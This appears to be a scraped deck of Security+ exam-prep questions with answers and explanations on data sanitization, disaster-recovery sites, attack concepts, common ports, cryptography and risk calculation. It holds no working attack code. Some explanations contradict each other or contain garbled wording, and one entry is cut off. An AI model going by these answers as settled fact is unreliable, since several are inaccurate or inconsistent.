that you are installing software that is from the vendor. Code reuse and dead code are closely related. Attackers can reuse code that was developed for another purpose. In some cases, the code reused is no longer valid or outdated. If the code is outdated, it is called dead code When comparing server-side versus client-side execution and validation, server-side execution and validation happens on the server when the data returns to the server. Client-side validation occurs on the browser on the client machine. The good thing about client-side validation is that provides a quicker response and does not generate a lot of overhead on the server. With that said, however, the browser needs to monitor for malicious code. Memory management watches for things like memory leaks. Memory leaks can be caused by a programmer failing to free up memory once the process using that memory has been completed. C and C++ are particularly prone to memory leaks. Use of third party libraries and software development kits (SDKs), while common, present security vulnerabilities. A flaw in an SDK can result in issues in every application that the SDK was used to develop. Data exposure occurs when there are not sufficient safeguards on a database. Failure to protect your database can be result in data hijacking and injection attacks.

You need to remove data from a storage media that is used to store confidential information. Which method is NOT recommended?

formatting Formatting is not a recommended method. Formatting or deleting the data from a storage media, such as a hard drive, does not ensure the actual removal of the data, but instead removes the pointers to the location where the data resides on the storage media. The residual data on the storage media is referred to as data remanence. The main issue with media reuse is remanence. The residual data can be recovered by using data recovery procedures. This can pose a serious security threat if the erased information is confidential in nature. Sanitization is the process of wiping the storage media to ensure that its data cannot be recovered or reused. Sanitization includes several methods, such as zeroization, degaussing, and media destruction. All of these methods can be used to remove data from storage media, depending on the type of media used. Most storage media with a magnetic base can be sanitized. However, CDs and DVDs often cannot be degaussed. If this is the case, the only option is physical destruction of the CD or DVD.Answer B is incorrect. Zeroization implies that a storage media is repeatedly overwritten with null values, such as multiple ones and zeros, for sanitization. Zeroization is generally used in a software development environment.Answer C is incorrect. Degaussing is the process of reducing or eliminating an unwanted magnetic field on a storage media. Degaussing sanitizes storage media by using magnetic forces. Degaussing devices produce powerful opposing magnetic fields that reduce the magnetic flux density of the storage media to zero. Degaussing is the preferred method for erasing data from magnetic media, such as floppy disks, hard drives, and magnetic tapes. Media destruction implies physically destroying the media to make it unusable. Security of the storage media can be crucial if the data stored is of confidential nature. Some storage media, such as CD-ROMs, cannot be sanitized due to the lack of a magnetic base. Therefore, it is recommended that you physically destroy them to prevent disclosure of confidential information.Answer D is incorrect. Data destruction and media sanitization methods that are covered on the Security+ exam include burning, shredding, pulping, pulverizing, degaussing, purging, and wiping. Burning, shredding, and pulping are most often used for documents and paper. Pulverizing, degaussing, purging, and wiping are most often used for storage media, such as hard drives and flash drives. Pulverizing is a form of physical destruction of the media. Degaussing eliminates the magnetic field. Purging renders data unrecoverable, while wiping or clearing removes the data. Degaussing is considered a form of purging, while overwriting is considered a form of wiping.Media viability controls are used to protect the viability of data storage media. Media viability control measures include proper labeling or marking, secure handling and storage, and storage media disposal.When implementing appropriate controls to ensure data security, you need to design the appropriate data policies, including the following: Data wiping - ensures that the contents of the media are no longer accessible. Data disposing - destroys the media to ensure that media is unusable. Data retention - ensures that data is retained for a certain period. The data retention policies should also define the different data types and data labeling techniques to be used. Data storage - ensures that data is stored in appropriate locations. In most cases, two copies of data should be retained and placed in different geographic locations. If an administrator wants to ensure that the reclaimed space of a hard drive has been sanitized while the computer is in use, he should implement cluster tip wiping. A cluster tip is the unused space in a cluster. If you have a file written on 7.1 clusters, there will be a 0.9 cluster tip with old or zero data. Cluster tips could contain some sensitive information.No matter which type of media you must dispose of or reuse, you need to ensure that your organization understands the legal and compliance issues that will affect the disposal. Certain types of protected data, such as personally identifiable information (PII) or personal health information (PHI), may require special handling when stored on media.

Which penetration-testing concept compromises one system so that it can be used to attack another system?

pivot Pivots attacks use a compromised system to attack another system. The first system is compromised in the initial exploit. That first system is later used to attack another system on the same network. Initial exploitation refers to compromising a non-target system so that it can be used in a pivot test against another system that is the true target.Answer A is incorrect. Active reconnaissance accesses the system directly to detect vulnerabilities. It uses tools and techniques such as network mapping, port scans, and network sniffing to test the system and identify potential sources of attack.Answer D is incorrect. Passive reconnaissance detects vulnerabilities in a network through techniques such as social engineering, accessing supposedly confidential information on publicly available databases, dumpster diving, and shoulder surfing. Answer C is incorrect. Persistence is when the compromised system is used in an attack at some point after the initial exploitation occurred. An example of persistence would be when a student's notebook computer contracts malware at a coffee shop, but the school network is not affected until the student logs in to the school network.

Which two alternate data center facilities are the easiest to test?

redundant hot site The hot site and the redundant site are the easiest to test because they both contain all of the alternate computer and telecommunication equipment needed in a disaster. Usually, testing either of these environments is as simple as switching over to them after ensuring they contain the latest versions of your data.Answer D is incorrect. A warm site is harder to test than a hot site or a redundant site, but easier to test than a cold site. It only contains telecommunications equipment. Therefore, to properly test disaster recovery procedures at the warm site, alternate computer equipment such as servers would need to be set up and configured.Answer A is incorrect. A cold site is the hardest to test. It only includes a basic room with raised flooring, electrical wiring, air conditioning, and telecommunications lines. To properly test disaster recovery procedures at the cold site, alternate telecommunications and computer equipment would need to be set up and configured.Hot sites and redundant sites are usually the most expensive to implement. Warm sites are less expensive than hot sites but more expensive than cold sites. Cold sites are the least expensive to implement.

What are some disadvantages to using a cold site?

testing availability recovery time Cold sites take a long time to bring online for disaster recovery. They also are not as available for testing as other alternatives. Therefore, recovery time and testing availability are two disadvantages to using a cold site.Cold sites are inexpensive. Cold sites require no daily administration time. Therefore, expense and administration time are two advantages to using a cold site. Cold sites are locations that meet the requirements for power and connectivity only.Hot sites are expensive. They require a lot of administration time to ensure that the site is ready within the maximum tolerable downtime (MTD). Therefore, expense and administration time are two disadvantages to using a hot site. Another disadvantage of a hot site is that it needs extensive security controls.Hot sites are available within the MTD and are available for testing. Therefore, recovery time and testing availability are two advantages to using a hot site.Warm sites are less expensive than hot sites, but more expensive than cold sites. The recovery time of a warm site is slower than for a hot site, but faster than for a cold site. Warm sites usually require less administration time because only the telecommunications equipment is maintained, not the computer equipment. Warm sites are easier to test than cold sites, but harder to test than hot sites.Hot, cold, and warm sites are maintained in facilities that are owned by another company. Hot sites generally contain everything you need to bring your IT facilities up. Warm sites provide some capabilities, including computer systems and media capabilities, in the event of a disaster. Cold sites do not provide any infrastructure to support a company's operations and requires the most setup time.Redundant sites are expensive and require a lot of administration time. Redundant sites are hot sites, but not all hot sites are redundant sites. Redundant sites are usually maintained by a company for itself. Hot sites are maintained by a company for another company. Redundant sites require a small recovery time and are easier to test than the facilities owned by other companies.

What is DNS poisoning?

the practice of dispensing IP addresses and host names with the goal of traffic diversion DNS poisoning is the practice of dispensing IP addresses and host names with the goal of traffic diversion. Properly configured DNS security (DNSSEC) on the DNS server can provide message validation, which, in turn, would prevent DNS poisoning.Answer C is incorrect. A SYN flood is the practice of continually sending a DNS server synchronization messages with spoofed packets. A SYN flood can transpire when a high number of half-open connections are established to a single computer.Answer B is incorrect. A DNS denial-of-service (DoS) attack is the practice of one computer transmitting malformed packets to the DNS server to cause the server to crash. A DNS distributed DoS (DDoS) attack is the practice of many computers transmitting malformed packets to the DNS server to cause the server to crash.Answer A is incorrect. ARP poisoning is similar to DNS poisoning. In this attack, a malicious actor sends falsified ARP messages over a local area network. In a domain hijacking attack, the registration of a domain name is changed without the permission of the original registrant.

What is cross-site request forgery (XSRF)?

when unauthorized commands are executed on a Web server by a trusted user Cross-site request forgery (XSRF) occurs when unauthorized commands are executed on a Web server by a trusted user.Answer D is incorrect. Fuzzing occurs when unexpected values are provided as input to an application to make the application crash.Answer A is incorrect. Cross-site scripting (XSS) occurs when a script on a Web site is configured to manipulate a computer other than the Web server.Answer B is incorrect. Footprinting occurs when network data is gathered to discover ways to intrude on the network.

Your organization uses a SOHO wireless router all-in-one device. The network has five wireless BYOD users and two web servers that are wired to the network. What should you configure to protect the servers from the BYOD users' devices? (Select the two best answers.)

Create a VLAN for the servers Create an ACL to access the servers If the servers and the BYOD users are on the same network, then the BYOD users could easily access the servers, regardless of whether a computer is connected in a wired fashion or wireless fashion by default. So to protect the servers from the users' mobile devices, you could first create a virtual LAN (VLAN) for the servers. This VLAN would separate the servers and you could then control who is allowed access to the servers via access control lists (ACLs) within the firewall portion of the SOHO all-in-one wireless router. If the SOHO router supported it, you could also place the web servers in a DMZ. The EAP-TLS authentication scheme should not be necessary for this scenario; it is used, for example, to authenticate wireless clients to a wireless network, which was not specified in the question. Changing the default HTTP port (which is normally 80) would cause your Internet guests some difficulty in finding the web servers, and is not necessary in this scenario either. Denying incoming connections to the outside router interface would also make it difficult for Internet users to access the web servers, and is therefore not recommended. If a physical port is disabled, anything connected to that port will be effectively offline. This also compounds the issue instead of solving it.

You are the systems administrator for your organization. You have been tasked to block database ports at the firewall. Which port should you block?

1433 Port 1433 is used by Microsoft SQL Server databases and should be blocked at the firewall if you want to block SQL Server activity. Port 3389 is used by the Remote Desktop Protocol. Port 443 is used by HTTPS. Port 53 is used by DNS.

You have been asked to choose a hashing algorithm for your organization. You decide to implement SHA-1. Which size checksum is produced by this algorithm?

160-bit Secure Hashing Algorithm (SHA) version 1 produces 160-bit checksums. SHA-256, also referred to as SHA-2, is a newer version of SHA and uses 256-bit checksums. SHA-256 should be used with a disk image to protect the image's integrity so that image can be retained for forensic purposes.MD5 produces 128-bit checksums. Data Encryption Standard (DES) uses 56-bit encryption keys. Advanced Encryption Standard (AES) uses 128-bit, 192-bit, and 256-bit encryption keys.

A user complains that he is unable to communicate with a remote virtual private network (VPN) using L2TP. You discover that the port this protocol uses is blocked on the routers in your network. You need to open this port to ensure proper communication. Which port number should you open?

1701 You should open port number 1701 because this is the UDP port used by Layer 2 Tunneling Protocol (L2TP). Port number 22 is reserved for Secure Shell (SSH) remote login. Port number 88 is assigned to the Kerberos protocol. Point-to-Point Tunneling Protocol (PPTP) uses UDP and TCP ports number 1723.There are a total of 65,535 ports in the TCP/IP protocol that are vulnerable to attacks. You should know the following commonly used ports and protocols. FTP - ports 20 and 21 SSH, SCP, and SFTP - port 22 Telnet - port 23 SMTP - port 25 TACACS - port 49 DNS server - port 53 DHCP - ports 67 and 68 TFTP - port 69 HTTP - port 80 Kerberos - port 88 POP3 - port 110 NetBIOS - ports 137-139 IMAP4 - port 143 SNMP - port 161 LDAP - port 389 SSL and HTTPS - port 443 SMB - port 445 LDAP with SSL - port 636 FTPs - ports 989, 990 Microsoft SQL Server - port 1433 Point-to-Point Tunneling Protocol (PPTP) - port 1723 RDP protocol and Terminal Services - port 3389

A server is located on a DMZ segment. The server only provides FTP service, and there are no other computers on the DMZ segment. You need to configure the DMZ to ensure that communication can occur. Which port should be opened on the Internet side of the DMZ firewall?

20 FTP uses ports 20 and 21 by default, so port 20 should be opened on the Internet side of the demilitarized zone (DMZ) firewall to enable the server to provide FTP services. The firewall will then allow FTP traffic through, but no other port traffic will be allowed to enter the DMZ. Only necessary ports should be opened on the Internet side of a DMZ firewall in order to limit hackers' abilities to access the internal network. Answers B, C, and D are incorrect. Port 80 is used by Hypertext Transfer Protocol (HTTP) to transfer Web pages. Port 110 is used by the Post Office Protocol (POP), and port 443 is used by Secure Sockets Layer (SSL). Access control lists (ACLs) are used to configure rules on network devices. These ACLs determine which communication is allowed or denied. ACLs can be based on port numbers, IP addresses, MAC addresses, and other criteria.

Which of the following equations represents the complexity of a password policy that enforces a lowercase password using the letters a through z, where "n" is the password length?

26^n The 26 refers to the 26 characters a through z (lowercase). The superscript "n" is a variable that refers to the length of the password. When calculating a password, the number of characters should be raised to a particular power that will be equal to the length of the password. So, if your policy in this example dictated a password that is eight characters long, then it would be 26 to the power of 8, or 208,827,064,576. In this case, n = 8, but it could be 10, 14, or whatever the security administrator sets the password length to in the password policy.

Root of Trust (RoT

A set of code and functions, usually embedded into a trusted platform module, that allows or denies tasks such as booting and drive encryption.

APT Advanced Persistent Threat

A set of computer-attacking processes that targets private organizations or nation states. Also refers to a group (often a government) that persistently targets a specific entity.

back-to-back perimeter

A type of DMZ that is located between the LAN and the Internet.

In which situation does cross-site scripting (XSS) pose the most danger?

A user accesses a financial organization's site using his or her login credentials. Cross-site scripting (XSS) poses the most danger when a user accesses a financial organization's site using his or her login credentials. The problem is not that the hacker will take over the server. It is more likely that the hacker will take over the client's session. This will allow the hacker to gain information about the legitimate user that is not publicly available. To prevent XSS, a programmer should validate input to remove hypertext. You can mitigate XSS by preventing the use of HTML tags or JavaScript image tags. Answers A, D, and C are incorrect. While the other situations can result in an XSS attack, these situations do not pose as much danger because it is unlikely that any real-world information will be obtained. There are different steps organizations and security professionals can take to protect against XSS attacks. For regular users, you should restrict untrusted JavaScript, use built-in browser protections, restrict external Web sites from requesting internal resources, and maintain system updates and patches. Developers should use whitelisting/blacklisting, OWASP Enterprise Security API (ESAPI), Microsoft AntiXSS Library, and Web vulnerability scanners. Network administrators should White Trash Squid Web Proxy plug-ins and Web Application Firewalls (WAFs). Finally, another technique is to coordinate between the Web application and the client browser to separate user-supplied data from web application HTML using a content security policy (CSP).

You need to implement voice over IP (VoIP) and wireless services for your company. Which AAA implementation was created to deal with these?

Diameter Diameter was created to deal with Voice over IP (VoIP) and wireless services. It was created to address new technologies that RADIUS was not designed to handle. Although Diameter was designed to be backwards compatible with RADIUS, some RADIUS servers have trouble working with Diameter servers. Diameter can utilize EAP, thereby providing better security than RADIUS.Answers C, D, and A are incorrect. Terminal Access Controller Access Control System (TACACS) is the CISCO implementation of RADIUS. TACACS is the first generation and combines the authentication and auditing processes. XTACACS is the second generation and separates the authentication, authorization, and auditing processes. TACACS+ is the third generation, and provides all of the features of XTACACS along with extended two-factor user authentication. TACACS+ uses multiple challenge responses for authentication, authorization, and auditing.Kerberos is a method of access, authentication, and authorization that is more secure than RADIUS, TACACS, or LDAP.Another authentication service that you need to be familiar with is Security Assertion Markup Language (SAML), which is an XML-based data format for exchanging authentication and authorization data between an identity provider and a service provider.

Your organization's server uses a public, unencrypted communication channel. You are required to implement protocols that allow clients to securely negotiate encryption keys with the server. What protocols should you select? (Select the two best answers.)

Diffie-Hellman ECDHE Standard Diffie-Hellman and ECDHE (Elliptic Curve Diffie-Hellman in ephemeral mode) were designed to securely negotiate encryption keys over an unencrypted channel. PBKDF2 is a program used for key lengthening; it is often used to make weak keys stronger. Steganography is the art of hiding messages, for example, within pictures or photographs. Symmetric encryption is not used in this scenario. Both answers (and other solutions) will be asymmetric metho

Which cryptographic technique changes multiple output bits when you change a single input bit?

Diffusion Diffusion is the cryptographic technique whereby a change of a single input bit results in a change of multiple output bits. Answer D is incorrect. Confusion is the technique where the relationship between the components of the message - the plain text, the key used, and the cipher text - is difficult to see. As a contrast, with ROT13, it is very easy to see the relationship between the components.Answer C is incorrect. Salting is a countermeasure to protect against rainbow table attacks. With salting, additional bits are added before the text is hashed. For example, if the password is "OpenSesame," salting will add additional characters prior to the hash, such as "Open00Salt99," which changes the hash value of the password. When the rainbow table searches for a password that matches "OpenSesame," the hash value will not match. Answer B is incorrect. An initialization vector (IV) is a number that is used once (nonce). As an example of this technique, assume that one portion of a cryptographic key was encrypted with RC4, and another portion included the IV. In the event the RC4 portion of the key was cracked, the IV that is used only once would protect the message from unauthorized decryption. Weak or deprecated algorithms are to be avoided. Wired Equivalent Privacy (WEP), for example, is now considered a weak encryption algorithm, as well as Data Encryption Standard (DES).

An administrator wants to reduce the size of the attack surface of a Windows Server. Which of the following is the best answer to accomplish this

Disable unnecessary services Often, operating system manufacturers such as Microsoft refer to the attack surface as all the services that run on the operating system. By conducting an analysis of which services are necessary and which are unnecessary, an administrator can find out which ones need to be disabled, thereby reducing the attack surface. Updates, service packs, antivirus software, and network intrusion detection systems (NIDSs) are good tools to use to secure an individual computer and the network but do not help to reduce the size of the attack surface of the operating system.

Which one of these is NOT characterized by identifying or exploiting a vulnerability when found?

Discovering a false positive Discovering a false positive is NOT characterized by identifying or exploiting a vulnerability when found. A false positive can occur when a vulnerability is identified that, in reality, is not a vulnerability. Answer D is incorrect. When you passively test security controls, you are performing a vulnerability scan to identify weakness, but not exploiting those weaknesses. Answer A is incorrect. When you attempt to identify common misconfigurations, you are looking for out-of-the-box settings that were not configured before being placed in service in the network, like a router that still has the default administrative password. When you are scanning to identify a vulnerability (or several vulnerabilities), you are primarily looking for common misconfigurations and/or a lack of security controls.Answer B is incorrect. When you scan to identify lack of security controls, you are looking for things like appropriate access controls, authentication controls, input validation, and proper logging, among others.

Management has asked you to implement an encryption algorithm that is based on the Diffie-Hellman key agreement. Which encryption algorithm should you implement?

ElGamal ElGamal is an asymmetric public key encryption algorithm based on the Diffie-Hellman key agreement. It is used for digital signatures, encryption of data, and key exchange. The mathematical functions in the ElGamal algorithm calculate discrete logarithms in a finite field. Diffie-Hellman is one of the first implementations of a public/private key system.Answer D is incorrect. HAVAL is a hashing algorithm and not an encryption algorithm. It processes 1024-bit block sizes of information. HAVAL creates message digests of variable sizes rather than a fixed output value. HAVAL produces hashes in lengths of 128, 160, 192, 224, and 256 bits.Answer C is incorrect. Knapsack is an asymmetric encryption algorithm. It is not based on the Diffie-Hellman key agreement.Answer B is incorrect. International Data Encryption Algorithm (IDEA) is a block cipher that operates on 64-bit blocks of data, requires a 128-bit key, and performs eight rounds of computation. The Pretty Good Privacy (PGP) encryption software uses IDEA.

What is the goal when you passively test security controls?

Probing for weaknesses When you passively test security controls, you are performing a vulnerability scan to identify weakness, but not exploiting those weaknesses. Answers B, C, and D are incorrect. When you are scanning to identify a vulnerability (or several vulnerabilities), you are primarily looking for common misconfigurations and/or a lack of security controls. These misconfigurations or a lack of controls can lead to exploiting the identified weakness, interfere with business operations, and cause infiltration of the network. When you scan to identify lack of security controls, you are looking for the presence or absence of appropriate access controls, authentication controls, input validation, and proper logging practices, among other security controls. When you attempt to identify common misconfigurations, you are looking for things like a router or wireless access point that still has the default administrative password. A false positive can occur when a vulnerability is identified that, in reality, is not a vulnerability.

Which of the following solutions should be used by heavily utilized networks?

Provider cloud Provider clouds can offer Infrastructure as a Service (IaaS), which can alleviate some of the stress an organization's network might suffer from. In addition, provider clouds can offer software (SaaS) and platforms (PaaS). VPN concentrators and remote access are not good choices for heavily utilized networks. They are meant for smaller groups of remote users. Telephony is not a solution for heavily utilized networks. It is quite the opposite; often networks are the solution for telephony usage.

As a security professional, you have been asked to advise an organization on which access control model to use. You decide that role-based access control (RBAC) is the best option for the organization. What are two advantages of implementing this access control model?

RBAC low security cost easier to implement Role-based access control (RBAC) has a low security cost because security is configured based on roles. For this reason, it is also easier to implement than the other access control models. During the information gathering stage of a deploying RBAC model, you will most likely need a matrix of job titles with their required access privileges.Answers C, D, and E are incorrect. RBAC is NOT the most user-friendly option. Discretionary access control (DAC) is more user friendly than RBAC because it allows the data owner to determine user access rights. If a user needs access to a file, he only needs to contact the file owner.RBAC is NOT discretionary is nature. DAC is discretionary, meaning access to objects is determined at the discretion of the owner.RBAC is NOT a highly secure environment. Mandatory access control (MAC) is considered a highly secure environment because every subject and object are assigned a security label.With RBAC, it is easy to enforce minimum privilege for general users. You would create the appropriate role, configure its permissions, and then add the users to the role. A role is defined based on the operations and tasks that the role should be granted. Roles are based on the structure of the organization and are usually hierarchical.RBAC is a popular access control model used in commercial applications, especially large networked applications.Rule-based access control is often confused with RBAC because their names are similar. With rule-based access control, access to resources is based on a set of rules. The user is given the permissions of the first rule that he matches.

A critical system in the server room was never connected to a UPS. The security administrator for your organization has initiated an authorized service interruption of the server to fix the problem. Which of the following best describes this scenario?

Fault tolerance Because the security administrator is deliberately interrupting service in a proactive effort to fix the problem, this scenario would be best described as fault tolerance. Also, the fact that a UPS is being installed to make the system tolerant of power loss lends to the fault tolerance answer. If the administrator was planning how to implement a new server, then it would be succession planning. Continuity of operations and disaster recovery deal with the scenario of an actual disaster and the planning for recovery from that disaster.

Your boss has tasked you with ensuring that reclaimed space on a hard drive has been sanitized while the computer is in use. What job should you perform?

Cluster tip wiping A cluster tip is the last portion of a hard drive's cluster that is not used by a file. Often, files take up more than a single cluster. The cluster remainders don't get erased by default, but could possibly contain data remanence. So, some disk cleanup programs contain an option to wipe the cluster tips, thus better sanitizing the drive. This can even be performed while the computer is in use.Encryption of any type does not sanitize the drive. Storage retention and data retention usually manifest themselves as policies. For example, an organization might have a storage retention policy that states a hard drive must be kept in storage for a minimum of three years before being fully sanitized and/or destroyed. This is common in high-security environments where data is extremely confidential, or where auditing and other logging information must be kept for a specific amount of time.

Which of the following reduces the chances of a single point of failure on a server when it fails?

Clustering Clustering enables a technician to use two or more servers together. In a failover cluster, a failure on the working server will cause that server to be disabled, but the next server in the cluster will then become active, so most single points of failure can be overcome. Virtualization of a server creates an entirely new server in a virtual machine, but it will have the same possibility of a single point of failure as a physical server. RAID (Redundant Array of Inexpensive Disks) reduces the chances of a server's single point of failure by allowing for fault-tolerant disks—but only for disks, and only certain kinds of RAID. If any other points on the server fail, RAID will not be able to recover. A cold site does not have servers ready to go if there is a single point of failure on a particular server. Hot sites could usually recover from these types of issues, but the users might have to physically go to the building, depending on the configuration.

Your organization must achieve compliance for PCI and SOX. Which of the following would best allow the organization to achieve compliance and ensure security? (Select the three best answers.)

Compartmentalize the network Apply technical controls to meet compliance regulations Establish a list of devices that must meet regulations Of the listed options, the best ones for achieving compliance with PCI (Payment Card Industry) and SOX (Sarbanes-Oxley) regulations include the following: Compartmentalize the network—divvy up the network with methods such as VLANs, subnetting, DMZs, whatever security boundary necessary to protect servers and clients that deal with sensitive data. Apply technical controls to meet compliance regulations—for example, vulnerability management, monitoring, protecting data, and so on. Establish a list of devices that must meet regulations: Any devices and computers that will have payment info, health info, or PII of any kind flowing through them should be analyzed, secured, and continually monitored.PCI compliance requirements can be summed up as the following:Protect cardholder dataBuild and maintain a secure networkMaintain an information security policyMaintain a vulnerability management programImplement strong access control measuresRegularly monitor and test systems and networks Establish a company framework is somewhat vague but could refer to creating an IT security framework. This is a very good idea, but it is more of a high-level plan on how to execute actual procedures and policies, and not the procedures and policies themselves. Centralizing management of all devices might be a good idea from a management perspective, but for security, certain devices will no doubt need to be compartmentalized. Establishing a list of users that work with each regulation is a good idea, but not as important as the technical controls previously mentioned. Note: Remember to familiarize yourself with whatever policies and procedures your organization employs, whether they are related to PCI, SOX, ISO, or other compliance and regulatory methods.

Your company has decided to implement a virtual private network (VPN), which will be used by remote employees to access internal network resources. Which two protocols could you use?

L2TP PPTP Point-to-Point Tunneling Protocol (PPTP) was created by Microsoft to work with the Point-to-Point Protocol (PPP) to create a virtual Internet connection so that networks can use the Internet as their WAN link. This connectivity method creates a virtual private network (VPN), allowing for private network security. In effect, PPTP creates a secure WAN connection using dial-up access.PPTP is known as a tunneling protocol because the PPTP protocol dials through the PPP connection, which results in a secure connection between client and server.Layer Two Tunneling Protocol (L2TP) is an enhancement of PPTP and can also be used to create a VPN. L2TP is a combination of PPTP and Cisco's Layer 2 Forwarding (L2F) tunneling protocols and operates at the Data Link layer (Layer 2) of the Open Systems Interconnection (OSI) model. L2TP uses User Datagram Protocol (UDP) for sending packets as well as for maintaining the connection. Internet Protocol Security (IPSec) is used in conjunction with L2TP for encryption of the data.Answer B is incorrect. PPP is a protocol used to establish dial-up network connections.Answer C is incorrect. Remote Access Service (RAS) is a service provided by the network operating system that allows remote access to the network via a dial-up connection. L2TP can be combined with Internet Protocol Security (IPSec) to provide enhanced security. Both PPTP and L2TP create a single point-to-point, client-to-server communication link.A VPN concentrator is a device that is used to create a remote access VPN. It is responsible for creating the tunnels between the endpoints.

You are investigating the authentication protocols used on your network. You discover that several authentication protocols are being used on your network. Which authentication protocol is the oldest?

LANman LAN Manager (LANMan) is the oldest authentication protocol listed. LANMan uses a hash and two Digital Encryption Standard (DES) keys. LANMan is seen as non-secure based on its ability to only store seven uppercase characters of data, making it susceptible to brute force attacks.Answer A is incorrect. Kerberos is the preferred authentication protocol for Windows 2000 Server, Windows Server 2003, and Windows Server 2008. It uses DES for encryption.Answers D and C are incorrect. NT LAN Manager version 1 (NTLMv1) and NTLMv2 replaced LANMan and use the MD4/MD5 hashing algorithm. NTLM is backwards compatible with LANMan.

An administrator configures Unix accounts to authenticate to a non-Unix server on the internal network. The configuration file incorporates the following information: DC=ServerName and DC=COM. Which service is being used?

LDAP DC=ServerName and DC=COM imply the use of a Microsoft Windows domain controller (thus the DC parameter). Lightweight Directory Access Protocol (LDAP) is a directory access and authentication service used by Windows domain controllers, among other technologies. SAML (Security Assertion Markup Language) is used to address single sign-on (SSO) solutions between two providers; it is based on XML. RADIUS and TACACS+ are other types of authentication servers and are not necessarily Microsoft domain-based. (In fact, TACACS+ is Cisco-based.) Also, they are more often used for remote authentication, whereas the scenario implies a local authentication technology.

An employee of your organization was escorted off of the premises for suspicion of fraudulent activity, but the employee had been working for two hours before leaving. You have been asked to find out what files have changed since last night's integrity scan. Which protocols could you use to perform your task? (Select the two best answers.)

MD5 HMAC The key word in this question is integrity. When we are dealing with the integrity of files, we often employ hashing. The only two hashing options in the supplied answers are MD5 and HMAC. Those cryptographic hash values could be compared to last night's integrity scan to find out which files have been changed in the two hours that the employee was working today.Elliptic curve cryptography (ECC), Advanced Encryption Standard (AES), Pretty Good Privacy (PGP), and Blowfish are all encryption protocols used to encrypt files. None of them are cryptographic hashing functions.

Your organization is trying to decide whether to use RSA or ECC to encrypt cellular communications. What is an advantage of ECC over the RSA algorithm?

ECC requires fewer resources. The advantage of Elliptic Curve Cryptography (ECC) over the Rivest, Shamir, and Adleman (RSA) algorithm is that it is more efficient and requires fewer resources than RSA.ECC is a method used to implement public-key (asymmetric) cryptography. ECC serves as an alternative to the RSA algorithm and provides similar functionalities, but ECC has a higher strength per bit than RSA. ECC performs digital signature generation, secure key distribution, and encryption and decryption of data.Wireless devices, handheld computers, smart cards, and cellular telephones have limited processing power, storage, power, memory, and bandwidth compared to other systems. To ensure efficient use of resources, ECC provides encryption by using shorter key lengths. Shorter key lengths do not imply less secure systems. Therefore, ECC provides the same level of security as RSA by using a shorter key that enables easier processing by the resource-constrained devices. For example, a 224-bit ECC key provides the same level of security as the 2048-bit keys used by legacy schemes. A 3072-bit legacy key and a 256-bit ECC key provide equivalent security. This is an obvious advantage when the future lies in smaller devices and increased security.Also keep in mind that you need to understand ephemeral keys and perfect forward secrecy. An ephemeral key is used when a key is generated for each execution of a key establishment process. In some cases, ephemeral keys are used more than once within a single session when the sender generates only one ephemeral key pair per message and the private key is combined separately with each recipient's public key. Perfect forward secrecy (PFS) ensures that a session key derived from a set of long-term public and private keys will not be compromised if one of the private keys is compromised in the future. For PFS to exist, the key used to protect transmission of data must NOT be used to derive any additional keys. If the key used to protect data transmission was derived from some other keying material, that material must NOT be used to derive any more keys.

After a recent security audit, several security issues were found. The auditor made suggestions on technologies that your organization should deploy. One of the suggestions made is to deploy SKIP. Which statement is true of SKIP?

SKIP is a key distribution protocol. Simple Key management protocol for Internet Protocols (SKIP) is a key management and distribution protocol used for secure IP communication, such as Internet Protocol Security (IPSec). SKIP uses hybrid encryption to convey session keys. These session keys are used to encrypt data in IP packets. SKIP uses a key exchange algorithm, such as the Diffie-Hellman algorithm, to generate a key-encrypting key that will be used between two parties. A session key is used with a symmetric algorithm to encrypt data. SKIP is not a key storage protocol. It is a key distribution and management protocol similar to Internet Key Exchange (IKE).SKIP works on a session-by-session basis, although it does not require prior communication for the establishment of sessions. SKIP employs encryption standards, such as Data Encryption Standard (DES) and Triple DES (3DES), to provide secure communication.SKIP does not deploy IKE for key distribution and management. IKE is a separate framework used to securely exchange keys to establish an IPSec session.Key exchange can occur either in band or out of band. In-band key exchange occurs over the same transmission media that is used by data and voice transmissions. Out-of-band exchange occurs outside the data and voice transmission media. In-band key exchange is less secure than out-of-band key exchange.

The IT director recommends that you require your service provider to give you an end-to-end traffic performance guarantee. What document will include this guarantee?

SLA An SLA, service-level agreement, is the part of a service contract in which the level of service is formally defined. This might include traffic performance guarantees, restoration guarantees, and minimum downtime guarantees. A chain of custody is the chronological documentation of evidence. DRP stands for disaster recovery plan, which includes contact information, determination of impact, a recovery plan, and so on. Incident response procedures are sets of procedures that an investigator will use when examining a computer security incident. They might include preparation, identification, containment, eradication, recovery, and lessons learned.

CAM table

The Content Addressable Memory table, a table that is in a switch's memory that contains ports and their corresponding MAC addresses.

You have been tasked by your boss with calculating the annualized loss expectancy (ALE) for a $5000 server that crashes often. In the past year, the server crashed 10 times, requiring a reboot each time, which resulted in a 10% loss of functionality. What is the ALE of the server?

$5000 If the server had a 10% loss of functionality, then that would be $500, or 1/10th of the server value. If this happened 10 times per year, then you would multiply that individual loss of $500 × 10, resulting in $5000 loss for the year. Remember that the ALE is the total loss in dollars per year for a specific incident. The entire quantitative risk assessment equation isSLE × ARO = ALEIn this case, the single loss expectancy (SLE) is 10%, which equals $500. The annualized rate of occurrence (ARO) is the number of times per year that the incident occurred—in this case, 10. So:$500 × 10 = $5000. The ALE = $5000, which just happens to be the value of the server. Hmmm, time for a replacement? At the very least, some investigative work needs to be done to find out why the server is going down so often.The other answers of $500, $10,000, and $50,000 are not correct because they do not fit the equation of SLE × ARO = ALE. Math doesn't lie.

What port and transport mechanism does TFTP use by default?

69 and UDP TFTP, the Trivial File Transfer Protocol, uses port 69 by default, and utilizes the UDP (User Datagram Protocol) connectionless transport mechanism. This makes for a simple, lightweight protocol used to automate the transfer of basic files such as boot files in a localized environment. For example, if a PXE-compliant client computer boots off of the network, it might make use of an embedded TFTP program within the network card to transfer the appropriate boot files from a server located somewhere on the local area network. TFTP is inherently insecure, so it is not recommended for use on the Internet. Port 68 is used by the Dynamic Host Configuration Protocol (DHCP) (client side) and the client side of the Bootstrap Protocol (BOOTP). TCP is the Transmission Control Protocol, which offers a guaranteed, connection-oriented transport mechanism, in contrast to UDP. TCP is not used by TFTP via port 69 or DHCP via port 68 (or port 67 for that matter).

A Web server is located on a DMZ segment. The Web server only serves HTTP pages, and there are no other computers on the DMZ segment. You need to configure the DMZ to ensure that communication can occur. Which port should be opened on the Internet side of the DMZ firewall?

